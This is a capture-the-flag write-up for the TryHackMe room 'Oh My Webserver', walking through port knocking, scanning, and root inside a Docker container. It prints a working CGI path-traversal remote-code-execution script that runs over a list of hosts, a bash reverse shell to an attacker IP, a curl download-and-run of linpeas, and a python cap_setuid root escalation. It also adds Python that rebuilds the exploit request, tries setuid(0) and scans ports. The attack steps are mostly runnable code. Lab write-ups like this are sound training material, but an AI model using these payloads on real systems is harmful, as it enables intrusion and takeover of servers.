Oh My Webserver — Writeup
--
LINK TO THE ROOM : https://tryhackme.com/room/ohmyweb
My Target IP : 10.10.215.246
Let’s run a quick recon on the Target IP
nmap 10.10.215.246 -p- --min-rate 1000
Strange, I am getting port 80 reported as closed.
This is something I learned in a CTF: try the knock command (port knocking) and check whether the port opens afterwards.
And it worked!
Running a detailed scan on the discovered ports.
nmap 10.10.215.246 -p 80,22 -sCV -oN nmap_initial -Pn
Started directory bruteforcing on the web server.
There is an error page which might be exploitable, but we don't know for sure.
So let's use the most powerful tool in CyberSec, which is GOOGLE.
On googling for an exploit for the version of the web server running, I found this PoC (a CGI path traversal: the `%2e` segments decode to `..` and walk out of /cgi-bin/ to whatever path is given as the second argument; the POST body is then executed by that script, e.g. /bin/sh):
#!/bin/bash
# Usage: ./PoC.sh <TARGET-LIST.TXT> <PATH> [COMMAND]
# Sends the traversal request to every host in the list. The POST body is run
# by the script reached at <PATH> (e.g. /bin/sh), so <COMMAND> becomes RCE.
if [[ -z $1 || -z $2 ]]; then
    echo "Set [TARGET-LIST.TXT] [PATH] [COMMAND]"
    echo "  ./PoC.sh targets.txt /etc/passwd"
    echo "  ./PoC.sh targets.txt /bin/sh whoami"
    exit 1
fi
for host in $(cat "$1"); do
    echo "$host"
    # --path-as-is stops curl from collapsing the dot segments before sending
    curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"
done
# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami
First copy this exploit and save it as exploit.sh, then create a targets.txt file containing "http://<targetIP>":
chmod +x exploit.sh
echo 'http://<TARGET_IP>' > targets.txt
bash exploit.sh targets.txt /bin/sh "<command>"
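Why the PoC's odd-looking path works is easier to see in code. The following Python is an added example, not the room's or the PoC author's code: it rebuilds the traversal path the script sends, shows that a check for literal `..` segments applied before percent-decoding lets the request through while a decode-then-normalise check blocks it (including the double-encoded variant), and assembles the raw POST the curl line produces so it can be replayed or inspected with a local listener. The host name, command and the default depth of 10 segments are illustrative assumptions.

```python
from urllib.parse import unquote
import posixpath

CGI_PREFIX = "/cgi-bin/"


def build_traversal_path(target, depth=10):
    """Rebuild the PoC's path: '.%2e' followed by (depth-1) '%2e%2e' segments,
    then the server-side path to reach. Every segment decodes to '..'; the
    encoding is what slips past a check that runs before decoding.
    depth=10 is an assumption, enough to reach '/' from any realistic cgi-bin."""
    segments = [".%2e"] + ["%2e%2e"] * (depth - 1)
    return CGI_PREFIX + "/".join(segments) + target


def literal_dotdot_filter(path):
    """Weak check: allow the request unless a raw segment equals '..'.
    Returns True when the path is allowed. This is what the PoC defeats."""
    return all(seg != ".." for seg in path.split("/"))


def resolve(path):
    """What the request reaches once the server decodes and normalises it:
    percent-decode, then collapse '.' and '..' segments."""
    return posixpath.normpath(unquote(path))


def hardened_filter(path, allowed_prefix=CGI_PREFIX):
    """Decode until the string stops changing (catches %252e double encoding),
    normalise, and only then require the result to stay under the prefix."""
    decoded = path
    for _ in range(5):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return posixpath.normpath(decoded).startswith(allowed_prefix)


def build_request(host, target, command, depth=10):
    """Raw HTTP/1.1 equivalent of the PoC's curl line: a POST whose body the
    script at `target` (e.g. /bin/sh) executes as if it were a CGI program.
    The leading 'echo Content-Type...' makes the reply a valid CGI response."""
    body = "echo Content-Type: text/plain; echo; " + command
    headers = [
        "POST " + build_traversal_path(target, depth) + " HTTP/1.1",
        "Host: " + host,
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: " + str(len(body)),
        "Connection: close",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


if __name__ == "__main__":
    # Hypothetical target and command, for illustration only.
    p = build_traversal_path("/bin/sh")
    print("sent path      :", p)
    print("literal filter :", "allowed" if literal_dotdot_filter(p) else "blocked")
    print("resolves to    :", resolve(p))
    print("hardened filter:", "allowed" if hardened_filter(p) else "blocked")
    print(build_request("10.10.215.246", "/bin/sh", "id"))
```

The request can be checked against a local listener (for example `nc -lvnp 8080` with the host set to `127.0.0.1:8080`) before pointing it at the target, which makes it easy to see exactly what the server receives.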
Now that we have RCE, let's get a reverse shell. Start a listener on port 4242 on the attacker machine first, then send the bash reverse-shell payload through the same exploit:
bash exploit.sh targets.txt /bin/bash "bash -i >& /dev/tcp/10.2.61.21/4242 0>&1"
What is the user flag?
To get root inside the Docker container, I downloaded linpeas (served from a web server on the attacker machine) and executed it:
curl http://<attacker_ip>:<port>/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh > out.txt
On reading the linpeas output I found something interesting in the capabilities: /usr/bin/python3.7 carries cap_setuid, so the interpreter is allowed to switch to uid 0.
cap_setuid can be exploited by:
/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
cat /root/user.txt
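To make the capability check repeatable rather than something to eyeball in linpeas output, here is an added Python example (not the room's, linpeas's or the author's code). It parses `getcap -r /` output in both libcap syntaxes, flags capabilities that are root-equivalent on any binary you can execute, and, when run as a script, attempts the same setuid(0) step as the one-liner above and reports the resulting uid. The sample getcap lines are constructed for the example, and the list of dangerous capabilities with its notes is my own triage shorthand, not an exhaustive reference.

```python
import os
import re
import shutil
import subprocess

# Triage notes for capabilities that hand over root when set on a binary you
# can run. This mapping is the example's own shorthand, not a complete list.
DANGEROUS_CAPS = {
    "cap_setuid": "setuid(0) is allowed: run the binary and switch to uid 0",
    "cap_setgid": "setgid(0) is allowed: join any group, including root's",
    "cap_dac_read_search": "read any file regardless of mode bits (e.g. /etc/shadow)",
    "cap_dac_override": "read, write or execute any file regardless of mode bits",
    "cap_sys_admin": "mount and a long list of other admin operations",
    "cap_sys_ptrace": "attach to and inject into any process",
    "cap_sys_module": "load kernel modules",
    "cap_chown": "take ownership of any file",
}

# Constructed sample output (not from the room) in both libcap syntaxes:
# older libcap prints 'path = caps+flags', newer prints 'path caps=flags'.
SAMPLE_GETCAP = """\
/usr/bin/python3.7 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/sbin/arping cap_net_raw=ep
/usr/bin/tar cap_dac_read_search,cap_chown=ep
"""


def parse_getcap(output):
    """Return [(path, [capability names])] from `getcap -r` output."""
    entries = []
    for line in output.splitlines():
        line = line.strip()
        if not line or "cap_" not in line:
            continue
        path, _, rest = line.partition(" ")
        # capability names stop at '+', '=' or ',' so a plain name regex works
        caps = re.findall(r"cap_[a-z_]+", rest)
        if caps:
            entries.append((path, caps))
    return entries


def triage(entries):
    """Return [(path, capability, note)] for every dangerous capability found."""
    return [(path, cap, DANGEROUS_CAPS[cap])
            for path, caps in entries
            for cap in caps if cap in DANGEROUS_CAPS]


def try_setuid_root():
    """Do what the python3.7 one-liner does and report the effective uid after.
    With CAP_SETUID in the effective set setuid(0) succeeds; otherwise EPERM."""
    try:
        os.setuid(0)
    except PermissionError:
        pass
    return os.geteuid()


if __name__ == "__main__":
    if shutil.which("getcap"):
        output = subprocess.run(["getcap", "-r", "/"], capture_output=True,
                                text=True).stdout
    else:
        output = SAMPLE_GETCAP  # fall back to the constructed sample
    for path, cap, note in triage(parse_getcap(output)):
        print(path + ": " + cap + ": " + note)
    print("effective uid after setuid(0) attempt:", try_setuid_root())
```

Running it with the capability-bearing interpreter (`/usr/bin/python3.7 captriage.py`) prints uid 0 at the end; running it with a normal interpreter prints your own uid, which is a quick way to confirm which binary actually carries the capability.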
What is the root flag?
For further enumeration I executed linpeas again:
/tmp/linpeas.sh
Didn't find much in linpeas, except this IP, so I thought of scanning it. For that I will have to get nmap onto the box, so let's fetch a static nmap build.
GitHub link: https://github.com/andrew-d/static-binaries
Now let's run a Python HTTP server on the attacker machine and transfer the binary to the shell.
chmod +x nmap_
let’s run this :
./nmap_ 172.17.0.1 -p- --min-rate 1000
(we know the IP to scan from linpeas’s output)
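Before fetching a static nmap it is worth remembering that the container already has python3.7, which is enough for a TCP connect scan of the Docker host. The following is an added example, not the room's or the author's code: a small concurrent connect scanner with nmap-style port specs. The default target 172.17.0.1 and the full port range mirror the scan above; the worker count and timeout are assumptions to tune for the link.

```python
import socket
import sys
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, timeout=1.0):
    """TCP connect to host:port. Returns (port, True) on success and
    (port, False) on refusal, timeout or any other socket error, so a
    filtered port simply shows up as not open."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:
            return port, False
        return port, True


def scan(host, ports, timeout=1.0, workers=64):
    """Connect-scan `ports` on `host` with a thread pool; return sorted open ports.
    64 workers is an assumption: raise it on a fast local link, lower it if the
    target starts dropping connections."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return sorted(p for p, is_open in results if is_open)


def parse_ports(spec):
    """Expand an nmap-style spec such as '22,80,5980-5990' into a sorted list,
    dropping anything outside 1-65535."""
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if "-" in part:
            lo, hi = part.split("-", 1)
            ports.update(range(int(lo), int(hi) + 1))
        elif part:
            ports.add(int(part))
    return sorted(p for p in ports if 1 <= p <= 65535)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "172.17.0.1"  # assumed Docker host
    spec = sys.argv[2] if len(sys.argv) > 2 else "1-65535"
    for port in scan(target, parse_ports(spec)):
        print(str(port) + "/tcp open")
```

From the container this runs as `/usr/bin/python3.7 scan.py 172.17.0.1 1-65535`; a full range with 64 workers and a one-second timeout finishes in a few minutes on the Docker bridge, and you can then hand only the open ports to nmap for version detection once the static binary is in place.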
Port 5986 seems interesting; let's google whether there is an exploit for the service running on it.
LINK TO THE EXPLOIT:
THERE YOU HAVE IT! Room is completed
HAPPY HACKING!! 🎉🥳
LINK TREE: https://linktr.ee/RishabhRai